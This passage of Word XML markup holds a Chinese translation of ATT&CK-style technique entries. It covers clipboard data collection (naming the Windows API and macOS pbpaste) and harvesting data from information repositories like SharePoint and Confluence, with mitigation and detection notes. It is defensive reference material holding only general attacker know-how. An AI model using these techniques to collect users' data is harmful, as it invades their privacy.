          <w:p w14:paraId="7C065416" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D4D60B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2466117A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009128C3" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB93648" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>在应用间复制信息时，</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会从用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测</w:t>
      </w:r>
      <w:r>
        <w:t>收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:t>剪贴板上的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E645481" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AA583" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问剪贴板数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C8BD2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760CF371" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSX</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>pbpaste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取剪贴板内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4356D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E28EB4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889961C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150A0CA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问剪贴板是</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上许多应用的合法功能。如果组织选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此行为，则可能需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找出</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据与其他可疑或非用户驱动的活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的</w:t>
      </w:r>
      <w:r>
        <w:t>关系</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D353F86" w14:textId="4C228C17" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00CA0B0E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="7D243676" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ED2BEDD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> T1213</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15F0ED31" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C84086" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6038B5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156C6467" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据泄漏防护，第三方应用日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A54856D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t>: Milos Stojadinovic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178FA7C7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="714A3D68" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="4822B864" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以利用信息库来挖掘有价值的信息。信息存储库是允许存储信息的工具，通常用于促进用户之间的协作或信息共享，并且可以存储可以帮助对手实现进一步目标的各种数据，或者直接访问目标信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7708A6AC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是可以在信息库中找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能对对手具有潜在价值的示例信息的简短列表：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF063A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>政策，程序和标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CEAEB8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物理</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑网络图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3911A5E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统架构图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75167FAF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术系统文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D4492" w14:textId="1104A4FA" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC99BD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目进度表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0292B584" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码片段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A31DD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00F45B92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向网络共享和其他内部资源的链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2667CBDF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>具体的公共信息库包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7704F9A8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r w:rsidRPr="0001461E">
        <w:t>Microsoft SharePoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EAA575" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在于许多企业网络中，通常用于存储和共享大量文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA4410" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0001461E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r w:rsidRPr="0001461E">
        <w:t>Atlassian Confluence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871C306" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Confluence</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常与</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Atlassian JIRA</w:t>
      </w:r>
      <w:r w:rsidRPr="0001461E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起在开发环境中使用，通常用于存储与开发相关的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F539345" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00E471A5" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2719"/>
        <w:gridCol w:w="7017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="31026C90" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="408"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4445B2F4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="40EF2244" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BC3092" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="6D3C5002" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450B8C55" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审计</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67135F4F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑定期检查关键和敏感信息库的帐户和权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="58A8DA16" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="580"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DD655A9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户帐户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A114D3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>实施最低权限原则。</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑实施包括身份验证和授权的访问控制机制。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00F45B92" w14:paraId="3F551A27" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="627"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60C36C5C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户培训</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
